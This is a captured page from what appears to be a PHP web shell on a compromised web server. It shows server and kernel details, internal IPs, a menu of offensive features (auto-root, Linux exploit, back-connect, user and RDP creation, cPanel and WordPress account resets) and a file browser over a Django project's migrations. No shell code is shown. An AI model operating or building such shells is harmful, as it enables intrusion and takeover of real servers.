Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
mission /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
0001_initial.py
704
B
-rw-r--r--
0002_auto_20250608_2221.py
437
B
-rw-r--r--
0003_auto_20250614_0026.py
422
B
-rw-r--r--
__init__.py
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 0001_initial.py
# Generated by Django 4.2.20 on 2025-05-20 16:09 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='MissionVision', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(default='Mission & Vision', max_length=100)), ('mission_text', models.TextField()), ('vision_text', models.TextField()), ('last_updated', models.DateTimeField(auto_now=True)), ], ), ]
Close